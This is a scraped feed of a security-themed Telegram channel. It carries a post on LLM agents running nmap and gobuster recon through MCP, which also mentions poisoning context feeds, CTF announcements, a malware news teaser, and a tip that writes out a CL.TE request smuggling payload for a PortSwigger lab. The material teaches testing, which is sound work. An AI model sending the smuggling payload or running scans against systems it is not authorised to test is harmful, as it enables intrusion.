Forwarded from Mira
umm... yap
If you take hacking as a profession, experimenting with MCP is one of the cooler things you can do right now. it gives you a structured, protocol-driven way to expose tools (nmap, Burp, gobuster, even your scripts) as providers an LLM can call in sequence. basically it turns a model into an orchestrator that can handle recon workflows end-to-end without you manually chaining pipes. lemme give you this simple scenario: the agent runs nmap on a target. it parses the ports. decides to run gobuster on the exposed web service. maybe passes results to your own recon script. and finally presents you a nice little summary instead of 9000 lines of stdout. because MCP enforces standardized interfaces, you can sandbox providers, log and audit tool calls, and even apply policy/guardrails at the protocol layer, which is huge for both red-teamers (think pivoting across networked MCP providers or poisoning context feeds) and blue-teamers (detecting malicious providers or restricting unsafe tool use). it's even plausible in places where the ecosystem’s still rough and docs are obscure. you can start local with OSS GPTs to prototype, then move to the cloud when you need scale or shared workflows and integrations with CI/CD or SOC pipelines. maybe a hot take, but i feel like in a few years manually juggling pentest tools might feel irrelevant given that the fast dynamics in the field.
#meyapping
If you take hacking as a profession, experimenting with MCP is one of the cooler things you can do right now. it gives you a structured, protocol-driven way to expose tools (nmap, Burp, gobuster, even your scripts) as providers an LLM can call in sequence. basically it turns a model into an orchestrator that can handle recon workflows end-to-end without you manually chaining pipes. lemme give you this simple scenario: the agent runs nmap on a target. it parses the ports. decides to run gobuster on the exposed web service. maybe passes results to your own recon script. and finally presents you a nice little summary instead of 9000 lines of stdout. because MCP enforces standardized interfaces, you can sandbox providers, log and audit tool calls, and even apply policy/guardrails at the protocol layer, which is huge for both red-teamers (think pivoting across networked MCP providers or poisoning context feeds) and blue-teamers (detecting malicious providers or restricting unsafe tool use). it's even plausible in places where the ecosystem’s still rough and docs are obscure. you can start local with OSS GPTs to prototype, then move to the cloud when you need scale or shared workflows and integrations with CI/CD or SOC pipelines. maybe a hot take, but i feel like in a few years manually juggling pentest tools might feel irrelevant given that the fast dynamics in the field.
#meyapping
⚡5👍3💯3
perplexity ai is giving one month free pro usage for students
go and grab this opportunity :))
https://www.perplexity.ai/students
@AfroSec
go and grab this opportunity :))
https://www.perplexity.ai/students
@AfroSec
⚡5🔥2👏1
Forwarded from Tilet solution (Nebyat B Δ)
You don’t have to shine all the time. The moon rests too.
🔥6❤3
Forwarded from INSA Cyber Talent Center
የCTF ውድድር ጥሪ!
የኢንፎርሜሽን መረብ ደህንነት አስተዳደር (ኢመደአ)
6ኛው ሀገር አቀፍ የሳይበር ደህንነት ወርን ምክንያት በማድረግ የተዘጋጀ የCapture The Flag (CTF) ውድድር!!
የሳይበር ደህንነት ክህሎትዎን የሚፈትሹበት እና ከሌሎች የዘርፉ ባለሙያዎች ጋር የሚወዳደሩበት መድረክ !!
ይወዳደሩ! ይሸለሙ!
ለመመዝገብ፡- ከታች ያለውን QR ኮድ ስካን ያድርጉ
ቦታ የኢንፎርሜሽን መረብ ደህንነት አስተዳደር (ኢመደአ) በአካል
ቀን ጥቅምት 1/2018ዓ.ም
ከ ጠዋቱ 2፡ 30 በአካል
የኢንፎርሜሽን መረብ ደህንነት አስተዳደር (ኢመደአ)
6ኛው ሀገር አቀፍ የሳይበር ደህንነት ወርን ምክንያት በማድረግ የተዘጋጀ የCapture The Flag (CTF) ውድድር!!
የሳይበር ደህንነት ክህሎትዎን የሚፈትሹበት እና ከሌሎች የዘርፉ ባለሙያዎች ጋር የሚወዳደሩበት መድረክ !!
ይወዳደሩ! ይሸለሙ!
ለመመዝገብ፡- ከታች ያለውን QR ኮድ ስካን ያድርጉ
ቦታ የኢንፎርሜሽን መረብ ደህንነት አስተዳደር (ኢመደአ) በአካል
ቀን ጥቅምት 1/2018ዓ.ም
ከ ጠዋቱ 2፡ 30 በአካል
⚡3👍2🔥1
Forwarded from Brut Security
This media is not supported in your browser
VIEW IN TELEGRAM
How to manually check for CL.TE Request Smuggling Vulnerabilities:
1️⃣ See if a GET request accepts POST
2️⃣ See if it accepts HTTP/1
3️⃣ Disable "Update Content-Length"
4️⃣ Send with CL & TE headers:
POST / HTTP/1.1
Host: <HOST-URL>
Content-Length: 6
Transfer-Encoding: chunked
0
G
5️⃣ Send request twice.
If you receive a response like "Unrecognized method GPOST", you've just confirmed a CL.TE vulnerability!
Try this out for yourself in our CL.TE lab: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
1️⃣ See if a GET request accepts POST
2️⃣ See if it accepts HTTP/1
3️⃣ Disable "Update Content-Length"
4️⃣ Send with CL & TE headers:
POST / HTTP/1.1
Host: <HOST-URL>
Content-Length: 6
Transfer-Encoding: chunked
0
G
5️⃣ Send request twice.
If you receive a response like "Unrecognized method GPOST", you've just confirmed a CL.TE vulnerability!
Try this out for yourself in our CL.TE lab: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
❤1
Forwarded from Yekolo Temari (የቆሎ ተማሪ)
🎉 The 6th National Cybersecurity Month CTF Has Concluded! 🎉
For those of you who couldn’t make the cut or weren’t able to attend the #CTF in person, good news!
We’ve now made the #CTF publicly accessible for everyone to explore and take on the challenges.
🔗 Click here to register and get started!
Test your skills, learn from real-world scenarios, and see how far you can go.
P.S. The #CTF will be live until tomorrow evening
Let’s see what you’ve got! 💪💻
#CybersecurityMonth #CTF #yekolotemari
For those of you who couldn’t make the cut or weren’t able to attend the #CTF in person, good news!
We’ve now made the #CTF publicly accessible for everyone to explore and take on the challenges.
🔗 Click here to register and get started!
Test your skills, learn from real-world scenarios, and see how far you can go.
P.S. The #CTF will be live until tomorrow evening
Let’s see what you’ve got! 💪💻
#CybersecurityMonth #CTF #yekolotemari
Simulations labs
Cybersecurity Month CTF #2
The CTF will be a Jeopardy Style CTF where every team will have a list of challenges in different categories like Reverse Engineering, Web Security, Digital Forensics, Network Security and others. For every challenge solved, the team will get a certain amount…
⚡1👍1
Forwarded from The Hacker News
Hackers just turned GitHub into their command center.
When police take down their servers, the malware just… reboots itself from GitHub.
The twist? It hides configs inside images using steganography. This isn’t a glitch — it’s resilience by design.
Read how it works → https://thehackernews.com/2025/10/astaroth-banking-trojan-abuses-github.html
When police take down their servers, the malware just… reboots itself from GitHub.
The twist? It hides configs inside images using steganography. This isn’t a glitch — it’s resilience by design.
Read how it works → https://thehackernews.com/2025/10/astaroth-banking-trojan-abuses-github.html
🔥4😱3❤1